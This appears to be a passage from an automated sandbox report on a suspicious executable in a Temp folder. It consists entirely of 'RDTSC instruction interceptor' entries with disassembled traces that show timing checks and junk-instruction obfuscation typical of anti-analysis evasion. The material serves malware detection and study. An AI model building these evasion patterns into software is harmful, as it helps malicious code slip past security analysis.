                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B7551 second address: 3B75BE instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4785B0BF46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c mov dword ptr [ebp+1246CE51h], eax 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007F4785B0BF48h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 00000015h 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e mov di, cx 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ebp 0x00000036 call 00007F4785B0BF48h 0x0000003b pop ebp 0x0000003c mov dword ptr [esp+04h], ebp 0x00000040 add dword ptr [esp+04h], 00000015h 0x00000048 inc ebp 0x00000049 push ebp 0x0000004a ret 0x0000004b pop ebp 0x0000004c ret 0x0000004d or dword ptr [ebp+12493A3Ah], esi 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F4785B0BF4Fh 0x0000005d rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3B75BE second address: 3B75C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3EA3B0 second address: 3EA3E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 jns 00007F4784F102C6h 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop eax 0x00000010 jp 00007F4784F102CEh 0x00000016 pushad 0x00000017 jmp 00007F4784F102D4h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3EE9A8 second address: 3EE9AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A8C12 second address: 3A8C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push esi 0x00000009 call 00007F4784F102C8h 0x0000000e pop esi 0x0000000f mov dword ptr [esp+04h], esi 0x00000013 add dword ptr [esp+04h], 00000016h 0x0000001b inc esi 0x0000001c push esi 0x0000001d ret 0x0000001e pop esi 0x0000001f ret 0x00000020 movsx edx, di 0x00000023 call 00007F4784F102CAh 0x00000028 cmc 0x00000029 pop edx 0x0000002a lea eax, dword ptr [ebp+12499A18h] 0x00000030 mov dword ptr [ebp+122D1D11h], ebx 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 jns 00007F4784F102CCh 0x0000003f rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A9251 second address: 3A925B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A925B second address: 3A925F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A925F second address: 3A9263 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A93A0 second address: 3A93A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A93A4 second address: 3A93B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A93B2 second address: 3A93B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A93B6 second address: 3A93BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A93BC second address: 3A93C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A93C2 second address: 3A93E6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4785B0BF46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, esi 0x0000000d mov ecx, dword ptr [ebp+122D2CC5h] 0x00000013 push eax 0x00000014 pushad 0x00000015 jmp 00007F4785B0BF4Bh 0x0000001a push eax 0x0000001b push edx 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A93E6 second address: 3A93EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A950C second address: 3A9512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A9512 second address: 3A9517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A9AB6 second address: 3A9AEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dh, 5Eh 0x0000000c push 0000001Eh 0x0000000e sub dword ptr [ebp+122D2D1Eh], eax 0x00000014 nop 0x00000015 push ebx 0x00000016 jmp 00007F4785B0BF54h 0x0000001b pop ebx 0x0000001c push eax 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 js 00007F4785B0BF46h 0x00000026 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A9AEB second address: 3A9AEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A9CA0 second address: 3A9CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A9CA4 second address: 3A9CAE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A9CAE second address: 3A9CC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d ja 00007F4785B0BF46h 0x00000013 popad 0x00000014 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A9CC2 second address: 3A9CCC instructions: 0x00000000 rdtsc 0x00000002 je 00007F4784F102CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A9EEC second address: 3A9EF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A9EF0 second address: 3A9EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A9EF6 second address: 3A9F0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A9F0D second address: 3A9F12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A9F12 second address: 3A9F17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A9F17 second address: 3A9F6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F4784F102C8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 mov ecx, 64D6973Ah 0x00000029 jne 00007F4784F102CAh 0x0000002f mov dword ptr [ebp+122D1C67h], eax 0x00000035 lea eax, dword ptr [ebp+12499A18h] 0x0000003b cmc 0x0000003c mov dword ptr [ebp+122D1B78h], esi 0x00000042 nop 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push edi 0x00000048 pop edi 0x00000049 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A9F6F second address: 3A9F75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A9F75 second address: 3A9F7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A9F7A second address: 392249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a ja 00007F4785B0BF4Ah 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 nop 0x00000015 sub ecx, dword ptr [ebp+122D2B84h] 0x0000001b mov ecx, dword ptr [ebp+122D29A0h] 0x00000021 call dword ptr [ebp+122D2535h] 0x00000027 pushad 0x00000028 pushad 0x00000029 jg 00007F4785B0BF46h 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3EDB7C second address: 3EDB81 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3EDD0E second address: 3EDD14 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3EE598 second address: 3EE59C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3EE59C second address: 3EE5A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3EE5A2 second address: 3EE5AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 36CE96 second address: 36CEA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3F1261 second address: 3F127B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4784F102C6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F4784F102CAh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3F1561 second address: 3F1575 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4785B0BF48h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F4785B0BF46h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3F1575 second address: 3F1579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3F1579 second address: 3F15AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4785B0BF4Bh 0x00000012 push edi 0x00000013 push esi 0x00000014 pop esi 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 pop edi 0x00000018 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3F15AB second address: 3F15B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 je 00007F4784F102C6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3F517E second address: 3F518A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnc 00007F4785B0BF46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3F518A second address: 3F51BB instructions: 0x00000000 rdtsc 0x00000002 js 00007F4784F102C8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push ecx 0x0000000b ja 00007F4784F102C6h 0x00000011 push edi 0x00000012 pop edi 0x00000013 pop ecx 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a js 00007F4784F102C6h 0x00000020 jmp 00007F4784F102D1h 0x00000025 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3F51BB second address: 3F51CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F4785B0BF46h 0x00000010 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3F51CB second address: 3F51D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3F92CB second address: 3F92F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4785B0BF55h 0x00000009 push esi 0x0000000a push eax 0x0000000b pop eax 0x0000000c jc 00007F4785B0BF46h 0x00000012 pop esi 0x00000013 popad 0x00000014 push eax 0x00000015 push ecx 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3F92F5 second address: 3F9302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F4784F102C6h 0x0000000d rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3F9463 second address: 3F949D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F4785B0BF56h 0x0000000a push edx 0x0000000b jmp 00007F4785B0BF4Ah 0x00000010 pop edx 0x00000011 pushad 0x00000012 jnc 00007F4785B0BF46h 0x00000018 jmp 00007F4785B0BF4Ah 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3F95E6 second address: 3F95EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3F95EA second address: 3F95EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3F95EE second address: 3F9607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4784F102CFh 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3F9791 second address: 3F97D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F4785B0BF4Bh 0x00000011 jmp 00007F4785B0BF58h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3F97D5 second address: 3F97D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3F97D9 second address: 3F97E3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4785B0BF46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3FC735 second address: 3FC739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3FC739 second address: 3FC74B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push ebx 0x0000000a jne 00007F4785B0BF4Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 40230E second address: 402324 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4784F102C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 402324 second address: 402328 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 3A9898 second address: 3A98A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F4784F102C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 403467 second address: 40346B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 40346B second address: 403477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 403477 second address: 40347B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 40AAA1 second address: 40AAC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4784F102D3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ja 00007F4784F102CEh 0x00000011 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 408AF3 second address: 408AF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 408AF9 second address: 408AFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 408AFD second address: 408B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F4785B0BF55h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 408C96 second address: 408CA8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F4784F102CCh 0x0000000c jno 00007F4784F102C6h 0x00000012 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 409418 second address: 409458 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4785B0BF4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d ja 00007F4785B0BF46h 0x00000013 pushad 0x00000014 popad 0x00000015 js 00007F4785B0BF46h 0x0000001b popad 0x0000001c jnc 00007F4785B0BF4Ch 0x00000022 jp 00007F4785B0BF4Ch 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 409458 second address: 40945C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\AppData\Local\TempUMYOPKCKTL6HJCV6MNAMLRCE008IXNYA.EXERDTSC instruction interceptor: First address: 409686 second address: 40968A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
